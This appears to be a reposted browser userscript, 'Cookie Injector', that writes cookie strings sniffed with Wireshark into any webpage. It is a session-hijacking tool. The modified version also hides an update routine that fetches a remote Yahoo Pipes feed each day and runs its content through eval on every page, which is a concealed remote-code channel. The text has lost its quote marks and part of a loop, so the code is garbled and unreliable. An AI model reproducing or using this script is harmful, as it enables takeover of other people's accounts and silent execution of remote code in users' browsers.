// ==UserScript== // @name Cookie Injector (mod FF - TopicsExpress


// ==UserScript== // @name Cookie Injector (mod FF + Chrome) // @namespace dhedhe-sintyas.blogspot. // @description Inject Cookie String Into Any Webpage // @version 1.0 // @include * // ==/UserScript== /** Original Header: ========================================================== Cookie Injector BearsWithWings Inject Cookie String From Wireshark Dump Into Any Webpage * dustint/code/cookieinjector.user.js **/ //Anonomyous function wrapper (function (){ const yodUpdate = { script_id : 109320, script_version : 1.0, script_pipeId : 7015d15962d94b26823e801048aae95d, } function setValue(key, value) { localStorage.setItem(key, value); return false; } function getValue(key) { var val = localStorage.getItem(key); return val; } function usoUpdate(el) { const s_CheckUpdate = YodCheckUpdate + yodUpdate[script_id]; var md = parseInt(new Date().getDate()); var CheckUpdate = parseInt(getValue(s_CheckUpdate)); var NeedCheckUpdate = false; if (CheckUpdate !== md) { setValue(s_CheckUpdate, md); el = el ? el : document.body; if (el) { if (!document.getElementById(s_CheckUpdate)) { var s_gm = document.createElement(script); s_gm.id = s_CheckUpdate; s_gm.type = text/javascript; s_gm.innerHTML = function go + s_CheckUpdate + (itm){if(itm.value.items.length){return eval(unescape(itm.value.items[0].content).replace(/</g,\\).replace(/&/g,\&\));}}; el.appendChild(s_gm); } var s_gm = document.createElement(script); s_gm.type = text/javascript; var sSrc = pipes.yahoo/pipes/pipe.run?_id= + yodUpdate[script_pipeId]; sSrc += &_render=json&_callback=go + s_CheckUpdate; sSrc += &id= + yodUpdate[script_id] + &ver= + yodUpdate[script_version]; //sSrc += &redir=yes; s_gm.src = sSrc; el.appendChild(s_gm); NeedCheckUpdate = true; } } else { setValue(s_CheckUpdate, md); } return NeedCheckUpdate; } function yodrunScript() { var cookieInjector = function(){ var cI = this; /** * Cookie Injector Onload Function * Sets up the cookie injector dialogu */ cI.onLoad = function(){ //Create the DIV to contain the Dialog cI.dialog = document.createElement(div); cI.dialog.id = cookieInjectorDiv; cI.dialog.innerHTML = Enter Cookie as format:(ex: name=val;) separate with ;; var button = document.createElement(button); button.innerHTML = OK; button.addEventListener(click,cI.writeCookie,false); cI.dialog.appendChild(button); var button = document.createElement(button); button.innerHTML = Cancel; button.addEventListener(click,cI.hide,false); cI.dialog.appendChild(button); cI.dialog.setAttribute(style, display:none;position:fixed;opacity:0.9;top:40%;background-color:#DDDDDD;\ left:40%;width:20%;z-index:99999;padding:5px;border:solid 1px gray;\ font-family:Arial;font-size:12px;); document.body.appendChild(cI.dialog); cI.visible = false; } /** * Show the dialog */ cI.show = function(){ cI.dialog.style.display = block; cI.visible = true; } /** * Hide the dialog */ cI.hide = function(){ cI.dialog.style.display = none; cI.visible = false; } /** * Gets the wireshark dump string and converts it into cookies */ cI.writeCookie = function(){ //Grab a handle to the text field which contains the string var cookieNode = document.getElementById(cookieInjectorCookie); var cookieText = cI.cleanCookie(cookieNode.value); cookieNode.value = ; //We have to add the cookies one at a time, so split around the colin var cookieArray = cookieText.split(;); var injectedval = 0; for(var x=0; x=2) { var name, val; if ((name = cookievalArray[0].toString().trim()) && (val = cookievalArray[1].toString().trim())) { //document.cookie = name+=+val+; path=/; document.cookie = cookieArray[x]+; path=/; //alert(name+=+val); injectedval++; } } } if (injectedval) { alert(All Cookies Have Been Written); cI.hide(); } else { alert(Invalid (ex: name=val;) separate with ;); } } /** * Do a little big of cleanup on the cookie string, Mostly we are looking * To get rid of the Cookie: string that Wireshark prepends to the cookie string */ cI.cleanCookie = function(cookieText){ var cookie = cookieText.replace(Cookie: ,); return cookie; } /** * Handle all keypresses, we are looking for an ALT-C key-combo. Since we cant detect * Two keys being pressed at the same time, we first make sure the ALT key was pressed * then we wait to see if the C key is pressed next */ cI.keyPress = function (e){ //Check to see if C is pressed after ALT if(e.keyCode == 67 && cI.ctrlFire){ if(!cI.visible){ cI.show(); }else{ cI.hide(); } } //Make sure the Alt key was previously depressed if(e.keyCode == 18){ cI.ctrlFire = true; }else{ cI.ctrlFire = false; } } }; if (document.getElementById(cookieInjectorDiv)) return; //if (document.getElementById(cookieInjectorDiv_yodrunScript)) return; var cI = new cookieInjector({}); //Setup our dialog after the document loads //window.addEventListener(load, cI.onLoad,false); cI.onLoad(); //Capture all onkeydown events, so we can filter for our key-combo window.addEventListener(keydown, cI.keyPress,false); } var script = document.createElement(script); script.type = text/javascript; script.id = cookieInjectorDiv_yodrunScript; script.textContent = ( + yodrunScript + )();; document.body.appendChild(script); usoUpdate(); })();
Posted on: Thu, 14 Nov 2013 00:16:17 +0000

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